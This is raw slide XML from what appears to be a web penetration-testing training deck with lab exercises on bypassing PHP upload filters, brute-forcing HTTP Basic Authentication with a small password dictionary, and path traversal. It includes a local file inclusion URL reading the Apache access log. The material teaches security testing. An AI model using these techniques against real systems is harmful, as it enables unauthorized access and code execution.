            <a:ext cx="7600680" cy="528300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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="6552720" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Case 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>http://localhost/upload/upload3/lampiran.html</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="554" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="555" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1238400"/>
            <a:ext cx="8229240" cy="508608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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="7695720" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Not allowed? Then we should modify our file extension.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="558" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="508608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Shape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Well done!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="561" name="Picture 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8184960" cy="510516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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="152640"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Review our code!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="563" name="Picture 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="1447920"/>
            <a:ext cx="8569080" cy="427176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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="8305560" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Task 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Objective : Upload malicious php file and execute the file with php extension</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1. Open this link : http://localhost/upload/upload4/lampiran.html </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>2. Try to upload php file. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>3. Review our code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>4. We can upload other file extension except php. So, how do we  upload the file with php extension and execute it?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Hint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> : Upload a file with *no* extension. The server will read our php file as it was an image file.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Our code!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="567" name="Picture 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609480" y="1295280"/>
            <a:ext cx="7973640" cy="470988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457200" y="-152280"/>
            <a:ext cx="8991360" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Brute force at HTTP Basic Authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="570"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152280"/>
            <a:ext cx="8229240" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Simple HTTP Authentication Bruteforcer using Brutus</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="572" name="Content Placeholder 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1082160" y="1219320"/>
            <a:ext cx="6978960" cy="493668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457200" y="-228600"/>
            <a:ext cx="7924320" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Create two dictionary file. Save it as user.txt and pass.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>passwd</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>123</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1234</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>12345</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>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Gray box</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752480"/>
            <a:ext cx="7619760" cy="4373280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Analyst engages the target with limited knowledge of its defenses and assets and full knowledge of channels. The target is prepared for the audit, knowing in advance all the details of the audit. A gray box audit tests the skills of the Analyst. The nature of the test is efficiency. The breadth and depth depends upon the quality of the information provided to the Analyst before the test as well as the Analyst’s applicable knowledge. This type of test is often referred to as a Vulnerability Test and is most often initiated by the target as a self-assessment.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258"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59"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60"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206494CB-A90D-415A-B355-620111D200F0}" type="slidenum">
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261"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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-228600"/>
            <a:ext cx="9295920" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Target http://192.168.56.10/upload/upload2/uploadfile/ user file:user.txt pass file:pass.txt</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="576" name="Content Placeholder 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1050840" y="1219320"/>
            <a:ext cx="7041600" cy="493668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457200" y="-76320"/>
            <a:ext cx="5790960" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Path Traversal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="604"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A Path Traversal attack aims to access files and directories that are stored outside the web root folder.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control.“../” sequences to move up to root directory, thus permitting navigation through the file system.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457200" y="-304920"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Path Traversal + Local File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>http://192.168.56.10/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>rfi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>include.php?index</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>=../../apache/logs/access.log</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="606" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219320"/>
            <a:ext cx="8229240" cy="4936680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="607" name="Picture 3"/>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extShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-76320"/>
            <a:ext cx="8381520" cy="1371240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="D1282E"/>
                </a:solidFill>
                <a:latin typeface="Arial Black"/>
              </a:rPr>
              <a:t>Local File Inclusion to Remote Code Execution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
